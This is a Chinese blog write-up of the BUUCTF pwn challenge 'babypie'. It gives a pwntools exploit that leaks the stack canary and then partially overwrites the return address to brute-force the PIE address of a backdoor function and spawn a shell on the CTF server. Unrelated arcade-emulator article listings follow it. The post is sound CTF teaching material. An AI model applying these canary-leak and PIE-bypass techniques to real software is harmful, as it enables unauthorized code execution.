BUUCTF Pwn linkctf_2018.7_babypie 题解

于 2025-02-10 06:17:38 发布
阅读量274 收藏 2
点赞数 7
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/145541124
版权

下载 exeinfo checksec

开启了NX Canary和PIE 64位

IDA64 查看

明显的栈溢出漏洞

发现有后门函数

目的是栈溢出到后门函数执行binsh

首先需要绕过Canary保护:

先启用pwndbg调试:

查看栈情况后,可以看到Canary和输入的字符差了 0xB8-0x90=0x28 和RBP差了8字节

构造第一个payload泄露canary:

payload1 = b'a' * (0x28 + 1)
#+1为了将canary结尾的\x00去掉使puts能够打印出canary
p.sendafter("Name:\n", payload1)
p.recvuntil(b'a' * (0x28 + 1))
canary = u64(p.recvn(7).rjust(8, b'\x00'))
print(hex(canary))

Canary保护已经解决,接下来就是绕过PIE保护

IDA上的后门函数只知道后三位

这里要采用栈上的部分写方式 爆破得到后门函数的确切地址

exp:

from pwn import *

#gdb.attach(p)
#pause()

while True:
    p = remote("node5.buuoj.cn", 27768)
    #p = process('./babypie')
    payload1 = b'a' * (0x28 + 1)
    #+1为了将canary结尾的\x00去掉使puts能够打印出canary
    p.sendafter("Name:\n", payload1)
    p.recvuntil(b'a' * (0x28 + 1))
    canary = u64(p.recvn(7).rjust(8, b'\x00'))
    print(hex(canary))

    payload2 = b'a' * 0x28 + p64(canary) + b'b' * 8 + b'\x3E\x0A'
    #小端序 所以0x3E放最前面
    p.sendafter(":\n", payload2)
    p.interactive()
    p.close()

运行,得到flag:

Winkawaks模拟器设置中文界面详细教程
nntxthml的博客
03-01 1225
Winkawaks作为一款经典的街机模拟器,凭借其强大的兼容性和丰富的游戏资源,吸引了众多游戏爱好者的青睐。无论是怀旧的经典街机游戏,还是一些较为冷门的作品,Winkawaks都能为玩家提供极佳的游戏体验。同时,我们也期待Winkawaks模拟器能够在未来继续更新和完善,为玩家提供更多优质的游戏资源和更加便捷的使用体验。在未来的发展中,随着技术的不断进步和玩家需求的日益增长,Winkawaks模拟器有望成为更多游戏爱好者的首选工具。首先,我们需要双击Winkawaks模拟器的图标,进入软件主界面。
uni真机调试页面空白_模拟器最强BIOS篇,如何使用uni-bios
weixin_39763033的博客
12-10 2627
uni-bios是CPS2SHOCK小组出品的MVS改版BIOS,功能非常强大,内置家用机及街机模式切换,音乐盒,作弊系统,ROM CRC 检验。还有一个很重要的功能,就是可以跳过游戏的红字警告。现在uni-bios.rom的版本有:1.0、1.11.21.2旧版、1.3、2.0、2.12.22.3、3.0、3.1、3.2、3.2、3.3在NeoRageX 0.8版之前的版本、Nebula...
街机游戏:前端纳米度-街机游戏项目
02-20
经典街机游戏克隆项目 目录 指示 这是Udacity的前端Web开发人员Nanodegree的项目。 我按照Udacity的要求并使用提供的代码和图像制作了这款街机游戏。 从玩 使用箭头键移动。 每当您到达屏幕顶部时,游戏难度就会增加。 如果玩家击中敌人,则玩家会失去分数并且玩家将自动回到起始位置。 一颗星星会从体面的水平出现,您可以赚取额外的积分。 一颗心脏会出现得体的状态,您可以恢复玩家的生命。 安装 请使用以下命令下载 git clone https://github.com/misakimichy/arcade-game.git 在浏览器中打开index.html,就可以开始游戏了。 或者,您可以将zip文件下载到硬盘上。 点击上方的绿色按钮“克隆或下载”,然后选择“下载ZIP”。 打开文件夹arcade-game-master 。 在浏览器中打开index.h
Atitit. 常用街机系统and 模拟器总结 snk neo geo cps mame sfc smc
weixin_33860528的博客
08-17 899
Atitit. 常用街机系统and 模拟器总结 snk neo geo cps mame sfc smc    1. #-------常用 游戏类型 1 2街机的历史 2 3. #=====================常用街机系统 3 4. NEO GEO,SNK之系统 3 5. SNK新日本企划 3 6. CPS2和CPS1,,CAPCOM早期街机的机版系统 4 7. MAME系统...
街机模拟器MAME.zip
07-19
MAME是一个非营利性项目。其主要目的是说明模拟街机游戏的原理,这样既有利于教育又可以保存经典的街机游戏。MAME是能够玩游戏,但这不是MAME的首要重点。MAME is free. Its source code is free. Selling either is not allowed.
探索复古游戏的未来:Galagino - ESP32 弹幕式街机模拟器
gitblog_00029的博客
05-27 456
探索复古游戏的未来:Galagino - ESP32 弹幕式街机模拟器 去发现同类优质开源项目:https://gitcode.com/ 在21世纪的今天,我们有机会用最小的成本和空间重温经典街机游戏的乐趣。Galagino 是一个基于 ESP32 的开源项目,它让你可以在小巧的设备上畅玩 Galaga, Pac-Man, Donkey Kong, Frogger, Digdug 和 1942 等...
nwMAME:基于Node-WebKit(NWJS)构建的开源MAME前端
02-03
什么是nwMAME? nwMAME是使用Web功能的多平台(Windows,Linux,OS X)MAME前端。 它使用HTML5 , JavaScript , CSS3并使用Node.JS , AngularJS , jQuery , Semantic UI等多种技术在NW.JS的顶部构建。 为什么选择nwMAME? 作为OS X用户,我在项目时对项目产生了影响,因为OpenEmu不足以按我的期望来管理MAME库,并且在OpenEmu中使用MAME并放弃详细的MAME设置使我发疯! 这就是为什么我决定以自己的MAME前端为乐。 nwMAME是否与专用MAME-PC兼容? 从技术上讲,它
MAME街机对战模拟器源码demo
09-07
在本篇中,我们将深入探讨MAME街机对战模拟器的源码demo,了解其工作原理、核心功能以及如何进行设备对战。 一、MAME的基本概念与功能 1. 模拟器的核心:MAME模拟器的核心在于它能够精确地模拟出原始街机游戏硬件...
街机模拟器 MAME源码
09-26
街机模拟器MAME源码解析与应用探讨》 街机模拟器MAME,全称为Multiple Arcade Machine Emulator,是一款强大的多平台街机游戏模拟器。它的主要功能是复原各种经典街机游戏,让玩家能够在个人电脑、智能手机等设备...
摩托罗拉e6805合一街机模拟器
05-30
摩托罗拉e6805合一街机模拟器
mame街机模拟器安卓android源码
03-02
《mame街机模拟器安卓android源码》是一款专为Android平台设计的开源街机游戏模拟器,其核心是MAME(Multiple Arcade Machine Emulator),它致力于复原各种经典街机游戏,使得用户可以在现代设备上体验到过去的游戏...
️ 探索未来游戏体验——WACVR:打造极致虚拟现实街机模拟器
最新发布
gitblog_00006的博客
06-18 465
????️ 探索未来游戏体验——WACVR:打造极致虚拟现实街机模拟器 WACVR A VR arcade emulator 项目地址: https://gitcode.com/gh_mirrors/wa/WACVR ...
MAME模拟器debug帮助文档汉化一(介绍)
Byte Madman
01-16 1375
MAME是一个交互式仿真系统的调式器,用于调试或开发老式系统的仿真工具。可以用来创建作弊,HACKROM,或者研究软件的工作原理。用-debug参数可以激活自带的调试器。默认设置中,用键盘的"~"符号键可以进入调试器。按键也可以在设置中更改。调试器的界面取决于你的操作系统和构建MAME时的参数选项。调试器提供有多窗口界面,可以方便地查看内存或反汇编代码的内容。而调试器控制台窗口是一个特殊窗口,可以显示当前程序计数器地址,CPU和寄存器的值,和反汇编代码的内容,并提供了命令行界面。
WinKawaks街机模拟器:好用的街机模拟器
onlinedown_net的博客
08-30 2929
WinKawaks街机模拟器194个游戏是好用的街机模拟器之一,与Nebula和MAME齐名,WinKawaks街机模拟器194个游戏支持的游戏的有CAPCOM公司的CPS1,CPS2所有游戏,WinKawaks街机模拟器194支持多重画面显示处理特效,运行游戏的速度在这三个模拟器中是较快的。WinKawaks街机模拟器194聚集众多经典街机游戏,附带操作手册、游戏出招表等,还可联机对战。
安卓版kawaks街机模拟器,C8,V3,V8手柄冲突解决方案,物理改键
程序员养成计划
03-20 4536
准备工作:C8手柄*2+V3手柄*2,我们要调出以下组合。美中不足,相同类型的手柄,键值会冲突,导致4个人没法玩。本人通过更改手柄模式,成功试出了4种不冲突的组合模式。不排除还有其他可用的模式组合,没耐心的就按照我的来吧。kawaks_5.2.7.apk 做得很好。
[单机游戏] [街机游戏] 侍魂2霸王丸地狱变
03-07 1598
侍魂》是最早冲破了经典《街头霸王2》规则的几个格斗游戏之一,采用了不同的格斗系统,对很多操作进行了改进,包括图形效果,例如革命性的拉镜头效果,最早出现于《龙虎之拳》。说明:黑子有两个超必杀武器破坏技,黑子乱舞(→↘↓↙←→·A+B)伤血较少黑子狂舞(→←↙↓↘→·C+D)伤血较多。()为空中抓,类似于地面上的抓{近身后→/←·B/(A+B)/D/(C+D)},一般人较难掌握。()"名称未知" 空中相遇时↓+B/(A+B)()"名称未知" 空中相遇时↓+B/(A+B)
MAME模拟器debug帮助文档汉化四(执行调试器命令)
Byte Madman
01-22 373
启动或停止跟踪指定 的执行,如果未指定 CPU,则跟踪当前可见的 CPU。忽略调试器中指定的 CPU。开始或停止跟踪指定的 ,如果没有指定 CPU,则开始或停止跟踪当前可见的 CPU。通过可选的 参数,可以指定一个表达式,每次指定的异常条件触发时,都会对该表达式进行评估。需要注意的是,由于它能检测从异常返回的条件,如果试图跳出子程序,而在子程序完成前发生了中断/异常,执行可能会在异常处理程序结束时提前停止。 参数是可选的,如果省略,默认值为 1
bios模拟器_bios模拟器,罕见,但功能却很强大!
weixin_39610759的博客
11-28 4440
很多小伙伴平时自己或者朋友的电脑可能会遇到问题,比较严重的情况下,可能就需要重装系统了!但是在重装系统前一半是需要对BIOS进行设置的,不少人就卡到这了!对BIOS的各项功能不了解,怕设置出错!这怎么办呢?今天“事儿哥”给小伙伴们分享一个模拟器,不是你熟知的什么游戏模拟器,而是功能更强大BIOS模拟器,让你轻松掌握bios的设置! 文字版教程:1、获取BIOS模拟器 私信回复数字“0310”获取~...
学习Java实战:探索安卓街机模拟器源码
资源摘要信息: "本文讨论了如何查看Java源码以及分析了Java安卓手机...以上是对给定文件标题和描述中提到的知识点的详细解释,希望能够对想要了解如何查看Java源码和分析Java安卓手机街机模拟器源码的学习者有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值